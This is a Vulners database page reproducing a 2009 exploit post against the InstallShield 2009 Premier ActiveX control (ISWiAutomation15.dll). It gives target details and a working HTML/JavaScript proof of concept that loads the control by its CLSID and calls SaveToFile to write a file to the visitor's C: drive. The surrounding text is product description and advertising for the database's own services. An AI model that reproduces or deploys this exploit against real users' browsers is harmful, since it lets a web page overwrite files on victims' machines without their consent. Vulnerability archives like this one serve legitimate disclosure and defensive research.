Vulners
Lucene search
Installshield 2009 File Overwrite
`"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
""" :::::: :: :: :: :: :: :::: """
""" :: :: :: :: :::::: .. :::: :: """
""" ::::: ::: ::::: :: :: :: :: :: :::: """
""" :: :: :: :: : :: :: :: :: :: :: """
""" :::::: :: :: ::::: :: :::::: :: :: :::: rs.ir """
""" :: """
""" """
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
Anti-Security Research Team & Security Institute
#[+] Bug : Installshiled 2009 premier 15.0.0.53 Activex (ISWiAutomation15.dll) File Overwrite Expl0it
#[+] program Download : http://www.installshield.com/downloads
#[+] Author : the_Edit0r
#[+] Contact me : the_3dit0r[at]Yahoo[dot]coM
#[+] Greetz to all my friends
#[+] Tested on: Windows XP Pro SP2 with Internet Explorer 7
#[+] web site: Expl0iters.ir * Anti-security.ir
#[+] Big thnx: Aria-Security Team & H4ckcity Member
# Part Description :
--------------------
InstallShield lets you easily create Windows Installer and InstallScript installations and extend them
to database servers, Web services, and mobile devices. New Features InstallShield includes the following
new features. Ability to Associate InstallShield Prerequisites with Features for Chaining Installations
InstallShield now enables you to associate InstallShield prerequisites with one or more features. This
new type of InstallShield prerequisite is called a feature prerequisite. It is installed if a feature
that contains the prerequisite is installed and if the prerequisite is not already installed on the system.
Including InstallShield prerequisites in your project enables you to chain multiple installations together,
bypassing the Windows Installer limitation that permits only one Execute sequence to be run at a time.The
Setup.exe setup launcher serves as a bootstrap application that manages the chaining. The Redistributables
view is where you add InstallShield prerequisites to a project and specify whether you want them to run
before your main installation or be associated with one or more features in your main installation.Previously,
all InstallShield prerequisite installations were run before the main installation ran, and the InstallShield
prerequisites could not be associated with any features. This type of prerequisite, which is still available,
is called a setup prerequisite. Basic MSI and Web projects include support for this feature.
------------------------------------
targetFile = "E:\Program Files\InstallShield\2009\System\ISWiAutomation15.dll"
prototype = "Function InsertCustomAction ( ByVal pCustomAction As _ISWiCustomAction , ByVal sComment As String , ByVal sCondition As String , ByVal lSequenceNumber As Long ) As _ISWiSequenceRecord"
memberName = "InsertCustomAction"
progid = "ISWiAuto15.ISWiSequence"
# Part Expl0it & Bug Codes ( Poc ) :
------------------------------------
<b>
Installshiled 2009 premier 15.0.0.53 File Overwrite Expl0it <b/>
by : the_Edit0r <b/>
<b/>
<object classid='clsid:34E7A6F9-F260-46BD-AAC8-1E70E22139D2' id='Edit0r'></object>
<script>
try{
var obj = document.InsertCustomAction('Edit0r');
obj.AddPage(1);
obj.SaveToFile("C:/system_.ini");
window.alert('check C:');
} catch(err){ window.alert('Poc failed'); }
</script>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Sep 2009 00:00Current
7.4High risk
Vulners AI Score7.4